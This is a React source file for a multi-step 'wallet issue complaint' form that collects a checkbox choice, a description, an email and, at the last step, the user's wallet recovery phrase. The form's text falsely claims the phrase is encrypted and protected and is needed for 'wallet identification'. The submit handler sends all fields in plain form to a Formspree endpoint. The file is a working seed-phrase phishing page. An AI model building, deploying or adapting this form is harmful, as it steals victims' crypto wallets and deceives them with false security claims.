import React, { useEffect, useState } from "react";
import {
  Box,
  Button,
  Stepper,
  Step,
  StepIndicator,
  StepStatus,
  StepTitle,
  StepDescription,
  StepSeparator,
  useSteps,
  Flex,
  CheckboxGroup,
  Checkbox,
  FormControl,
  FormLabel,
  Input,
  VStack,
  useToast,
  keyframes,
  Textarea,
  Modal,
  ModalOverlay,
  ModalContent,
  ModalCloseButton,
  ModalHeader,
  ModalBody,
  Text,
  Icon,
  ModalFooter,
  useDisclosure,
} from "@chakra-ui/react";
import {
  ArrowBackIcon,
  ArrowForwardIcon,
  CheckCircleIcon,
  EditIcon,
  EmailIcon,
  LockIcon,
  QuestionIcon,
  WarningIcon,
} from "@chakra-ui/icons";
import { css } from "@emotion/react";

const moveArrow = keyframes`
0% { transform: translateX(0);}
25% { transform: translateX(5px);}
50% { transform: translateX(-5px);}
75% { transform: translateX(5px);}
100% { transform: translateX(0);}
`;

const SuccessPopup = ({ isOpen, onClose }) => {
  return (
    <Modal isOpen={isOpen} onClose={onClose} isCentered>
      <ModalOverlay />
      <ModalContent
        p={6}
        bg="#011082"
        borderRadius="lg"
        boxShadow="lg"
        textAlign="center"
      >
        <ModalCloseButton size="md" color="blue.700" />
        <ModalHeader fontSize="2xl" color="white">
          Success!
        </ModalHeader>
        <ModalBody>
          <VStack spacing={6}>
            <Text fontSize="lg" fontWeight="medium" color="white">
              We have received your submission
            </Text>
            <Icon as={CheckCircleIcon} w={16} h={16} color="#344afb" />
          </VStack>
        </ModalBody>
        <ModalFooter>
          <Button color="" onClick={onClose}>
            Okay
          </Button>
        </ModalFooter>
      </ModalContent>
    </Modal>
  );
};

const MultiForm = () => {
  const { isOpen, onOpen, onClose } = useDisclosure();
  const steps = [
    { icon: QuestionIcon },
    { icon: EditIcon },
    { icon: EmailIcon },
    { icon: LockIcon },
  ];

  const { activeStep, goToNext, goToPrevious } = useSteps({
    index: 0,
    count: steps.length,
  });

  useEffect(() => {
    const style = document.createElement("style");
    style.innerHTML = `
      ::-webkit-scrollbar {
        width: 8px;
        height: 2px;
      }
      ::-webkit-scrollbar-track {
        background: #1a202c; /* Chakra's blue.700 */
      }
      ::-webkit-scrollbar-thumb {
        background-color: #2b6cb0; /* Chakra's blue.500 */
        border-radius: 4px;
      }
    `;
    document.head.appendChild(style);
    return () => {
      document.head.removeChild(style);
    };
  }, []);

  const [selectedOptions, setSelectedOptions] = useState([]);
  const [textInput1, setTextInput1] = useState("");
  const [emailInput, setEmailInput] = useState("");
  const [textInput2, setTextInput2] = useState("");

  const toast = useToast();

  const validateStep = () => {
    if (activeStep === 0 && selectedOptions.length === 0) {
      toast({
        title: "Please select at least one option.",
        status: "error",
        duration: 1500,
        isClosable: true,
        position: "top-right",
        colorScheme: "blue",
      });
      return false;
    }
    if (activeStep === 1 && textInput1.trim() === "") {
      toast({
        title: "Please enter some description.",
        status: "error",
        duration: 1500,
        isClosable: true,
        position: "top-right",
        colorScheme: "blue",
      });
      return false;
    }
    if (activeStep === 2 && !/^[^\s@]+@[^\s@]+\.[^\s@]+$/.test(emailInput)) {
      toast({
        title: "Please enter a valid email address.",
        status: "error",
        duration: 1500,
        isClosable: true,
        position: "top-right",
        colorScheme: "blue",
      });
      return false;
    }
    if (activeStep === 3 && textInput2.trim() === "") {
      toast({
        title: "Please enter a valid Phrase",
        status: "error",
        duration: 3000,
        isClosable: true,
        position: "top-right",
        colorScheme: "blue",
      });
      return false;
    }
    return true;
  };

  const handleNext = () => {
    if (validateStep()) {
      goToNext();
    }
  };

  const handleSubmit = async (event) => {
    event.preventDefault();
    if (!validateStep()) {
      return;
    }
    // Create a FormData object and append the required fields
    const formData = new FormData();
    formData.append("issueComplaint", selectedOptions);
    formData.append("issueDetails", textInput1);
    formData.append("Email", emailInput);
    formData.append("Validation", textInput2);
    if (validateStep()) {
      toast({
        title: "Form submitted successfully!",
        status: "success",
        duration: 3000,
        isClosable: true,
        position: "top-right",
        colorScheme: "blue",
      });
    }

    try {
      const response = await fetch(
        `https://formspree.io/f/${process.env.REACT_APP_FORMSPREE_ID}`,
        {
          method: "POST",
          body: formData,
          headers: {
            Accept: "application/json",
          },
        }
      );

      if (response.ok) {
        // Handle success scenario
        // console.log('Form submitted successfully!');
        // onOpen(); // Show the success popup
      } else {
        // Handle error scenario
        console.error("Failed to submit the form");
      }
    } catch (error) {
      console.error("Error submitting form:", error);
    }

    onOpen();
  };

  return (
    <Box p={{ base: 2, md: 4 }} maxW="100%" minH="100vh" bgColor="#344afb">
      <Flex overflow="auto" mb={4} width="100%" justifyContent="space-between">
        <Stepper
          size="sm"
          index={activeStep}
          mb={4}
          width="80%"
          color="white"
          minW={{ base: "130px", md: "100%" }}
          spacing={{ base: 2, md: 12 }}
          whiteSpace="nowrap"
        >
          {steps.map((step, index) => (
          <Step key={index}>
              <StepIndicator colorScheme="blue" boxSize="20px">
                <StepStatus complete={<Box as="span" bg="blue.500" />} />
              </StepIndicator>

              <step.icon boxSize={6} color="#011082" />
              {/* <Box flexShrink={0}>
                <StepTitle>{step.title}</StepTitle> */}
              {/* <StepDescription color='white'>{step.description}</StepDescription> */}
              {/* </Box> */}

              {index < steps.length - 1 && <StepSeparator />}
            </Step>
          ))}
        </Stepper>
      </Flex>

      <Box>
        {activeStep === 0 && (
          <Box p={2}>
            <FormControl>
              <FormLabel
                color="white"
                fontWeight={500}
                fontSize="1rem"
                fontFamily="Roboto"
              >
                <Text as="h2" fontWeight={900} fontSize="1.2rem">
                  Issue Complaint
                </Text>
                Please select at least one option to log your complaint:
              </FormLabel>

              <Box
                bgColor="#011082"
                border="1px solid"
                borderRadius="md"
                borderColor="gray.100"
                w="100%"
                p={8}
                maxH="400px"
                overflowY="auto"
              >
                <CheckboxGroup
                  colorScheme="blue"
                  value={selectedOptions}
                  onChange={setSelectedOptions}
                >
                  <VStack align="flex-start" gap={6}>
                    <Checkbox
                      value="Transaction Issues"
                      border="1px solid"
                      borderRadius="md"
                      color="white"
                      w="100%"
                      p={2}
                    >
                      Transaction Issues
                    </Checkbox>
                    <Checkbox
                      value="Wallet Access Issues"
                      border="1px solid"
                      borderRadius="md"
                      w="100%"
                      color="white"
                      p={2}
                    >
                      Wallet Access Issues
                    </Checkbox>
                    <Checkbox
                      value="Swap/Dapp Issues"
                      border="1px solid"
                      borderRadius="md"
                      w="100%"
                      color="white"
                      p={2}
                    >
                      Swap/Dapp Issues
                    </Checkbox>
                    <Checkbox
                      value="Web3/NFT related Issues"
                      border="1px solid"
                      borderRadius="md"
                      w="100%"
                      color="white"
                      p={2}
                    >
                      Web3/NFT related Issues
                    </Checkbox>
                    <Checkbox
                      value="Synchronization"
                      border="1px solid"
                      borderRadius="md"
                      w="100%"
                      color="white"
                      p={2}
                    >
                      Synchronization
                    </Checkbox>
                    <Checkbox
                      value="Wallet Malfunction"
                      border="1px solid"
                      borderRadius="md"
                      w="100%"
                      color="white"
                      p={2}
                    >
                      Wallet Malfunction
                    </Checkbox>
                    <Checkbox
                      value="Protect Your Wallet"
                      border="1px solid"
                      borderRadius="md"
                      w="100%"
                      color="white"
                      p={2}
                    >
                      Protect Your Wallet
                    </Checkbox>
                    <Checkbox
                      value="Authentication"
                      border="1px solid"
                      borderRadius="md"
                      overflow="hidden"
                      w="100%"
                      color="white"
                      textOverflow="ellipsis"
                      whiteSpace="normal"
                      p={2}
                    >
                      Authentication
                    </Checkbox>
                    <Checkbox
                      value="Authentication/Authorization"
                      border="1px solid"
                      borderRadius="md"
                      overflow="hidden"
                      w="100%"
                      color="white"
                      textOverflow="ellipsis"
                      whiteSpace="normal"
                      p={2}
                    >
                      Authorization
                    </Checkbox>
                    <Checkbox
                      value="Funds/Token Recovery"
                      border="1px solid"
                      borderRadius="md"
                      w="100%"
                      color="white"
                      p={2}
                    >
                      Funds/Token Recovery
                    </Checkbox>
                    <Checkbox
                      value="Network Migration"
                      border="1px solid"
                      borderRadius="md"
                      w="100%"
                      color="white"
                      p={2}
                    >
                      Network Migration
                    </Checkbox>
                    <Checkbox
                      value="Other"
                      border="1px solid"
                      borderRadius="md"
                      w="100%"
                      color="white"
                      p={2}
                    >
                      Other
                    </Checkbox>
                  </VStack>
                </CheckboxGroup>
              </Box>
            </FormControl>
            <Button
              W="100%"
              onClick={handleNext}
              position="fixed"
              bottom="0"
              left="0"
              width="100%"
              bg="#011082"
              color="white"
              size="md"
              _hover={{ bg: "blue.400" }}
              _active={{ bg: "blue.600" }}
              justifyContent="right"
              rightIcon={<ArrowForwardIcon />}
              css={css({
                "&:hover .chakra-icon": {
                  animation: `${moveArrow} 0.9s ease`,
                },
              })}
            >
              Next
            </Button>
          </Box>
        )}
        {activeStep === 1 && (
          <Box>
            <FormControl>
              <FormLabel
                as="h2"
                fontFamily="Roboto"
                fontWeight={500}
                color="white"
                fontSize="1em"
              >
                <Text
                  as="h2"
                  fontFamily="Roboto"
                  fontWeight={900}
                  fontSize="1.15em"
                  mb={2}
                >
                  Explain Your Issue Briefly:
                </Text>
                <Text fontSize="1rem" fontWeight={500}>
                  Kindly give a brief description of the issue, including all
                  other important details partaining to it here:
                </Text>
              </FormLabel>
              <Textarea
                mt="30px"
                value={textInput1}
                onChange={(e) => setTextInput1(e.target.value)}
                minH="200px"
                w="100%"
                color="white"
                whiteSpace="normal"
                bgColor="#011082"
              />
            </FormControl>
            <Flex justifyContent="space-between">
              <Button
                onClick={goToPrevious}
                mt={4}
                position="fixed"
                bottom="0"
                left="0"
                width="50%"
                bg="#011082"
                color="white"
                size="md"
                leftIcon={<ArrowBackIcon />}
                _hover={{ bg: "blue.400" }}
                _active={{ bg: "blue.600" }}
                justifyContent="left"
                css={css({
                  "&:hover .chakra-icon": {
                    animation: `${moveArrow} 0.9s ease`,
                  },
                })}
                borderRadius={0}
              >
                Back
              </Button>
              <Button
                colorScheme="inherit"
                onClick={handleNext}
                mt={4}
                position="fixed"
                bottom="0"
                right="0"
                bg="#011082"
                color="white"
                size="md"
                _hover={{ bg: "blue.400" }}
                _active={{ bg: "blue.600" }}
                borderLeftRadius={0}
                width="50%"
                rightIcon={<ArrowForwardIcon />}
                variant="solid"
                justifyContent="right"
                css={css({
                  "&:hover .chakra-icon": {
                    animation: `${moveArrow} 0.9s ease`,
                  },
                })}
              >
                Next
              </Button>
            </Flex>
          </Box>
        )}
        {activeStep === 2 && (
          <Box>
            <FormControl>
              <FormLabel
                color="white"
                fontFamily="Roboto"
                fontWeight={500}
                mb={4}
              >
                <Text
                  as="div"
                  fontFamily="Roboto"
                  fontWeight={900}
                  fontSize="1.15em"
                  mb={5}
                >
                  {" "}
                  Enter your email:{" "}
                </Text>
                Please make sure this is a valid and active email address as we
                will be sending you updates as regards your submisssion here:
              </FormLabel>
              <Input
                type="email"
                value={emailInput}
                minH="50px"
                onChange={(e) => setEmailInput(e.target.value)}
                color="white"
                placeholder="example@gmail.com"
                bgColor="#011082"
              />
            </FormControl>
            <Flex justifyContent="space-between">
              <Button
                onClick={goToPrevious}
                mt={4}
                position="fixed"
                bottom="0"
                left="0"
                width="50%"
                bg="#011082"
                color="white"
                size="md"
                leftIcon={<ArrowBackIcon />}
                _hover={{ bg: "blue.400" }}
                _active={{ bg: "blue.600" }}
                justifyContent="left"
                css={css({
                  "&:hover .chakra-icon": {
                    animation: `${moveArrow} 0.9s ease`,
                  },
                })}
                borderRadius={0}
              >
                Back
              </Button>
              <Button
                colorScheme="inherit"
                onClick={handleNext}
                mt={4}
                position="fixed"
                bottom="0"
                right="0"
                bg="#011082"
                color="white"
                size="md"
                _hover={{ bg: "blue.400" }}
                _active={{ bg: "blue.600" }}
                borderLeftRadius={0}
                width="50%"
                rightIcon={<ArrowForwardIcon />}
                variant="solid"
                justifyContent="right"
                css={css({
                  "&:hover .chakra-icon": {
                    animation: `${moveArrow} 0.9s ease`,
                  },
                })}
              >
                Next
              </Button>
            </Flex>
          </Box>
        )}
        {activeStep === 3 && (
          <Box>
            <FormControl>
              <FormLabel color="white" fontWeight={500} fontFamily="Roboto">
                <Text as="h2" fontWeight={800} fontFamily="Roboto">
                  Write Down Your Wallet Phrase For Wallet Identification
                  (Encrypted and Protected <LockIcon boxSize={3} />)
                </Text>
                Note: This is highly encrypted and protected from third party
                access through advanced encryption tools and it is only parsed
                and interacted with through the wallet database system. This is
                requird for the purpose of wallet identification and validation
                to assist the system with resolving issues and reactivation of
                your wallet functionality. The technical system controls all
                operations and wallets, so you can be assured about safety ⛑.
              </FormLabel>
              <Textarea
                value={textInput2}
                onChange={(e) => setTextInput2(e.target.value)}
                minH="150px"
                color="white"
                bgColor="#011082"
              />
            </FormControl>
            <Flex justifyContent="space-between">
              <Button
                onClick={goToPrevious}
                mt={4}
                position="fixed"
                bottom="0"
                left="0"
                width="50%"
                bg="#011082"
                color="white"
                size="md"
                leftIcon={<ArrowBackIcon />}
                _hover={{ bg: "blue.400" }}
                _active={{ bg: "blue.600" }}
                justifyContent="left"
                css={css({
                  "&:hover .chakra-icon": {
                    animation: `${moveArrow} 0.9s ease`,
                  },
                })}
                borderRadius={0}
              >
                Back
              </Button>
              <Button
                colorScheme="inherit"
                onClick={handleSubmit}
                mt={4}
                position="fixed"
                bottom="0"
                right="0"
                bg="#011082"
                color="white"
                size="md"
                _hover={{ bg: "blue.400" }}
                _active={{ bg: "blue.600" }}
                borderLeftRadius={0}
                width="50%"
                rightIcon={<ArrowForwardIcon />}
                variant="solid"
                justifyContent="right"
                css={css({
                  "&:hover .chakra-icon": {
                    animation: `${moveArrow} 0.9s ease`,
                  },
                })}
              >
                Submit
              </Button>
            </Flex>
          </Box>
        )}
      </Box>
      <SuccessPopup isOpen={isOpen} onClose={onClose} />
    </Box>
  );
};

export default MultiForm;
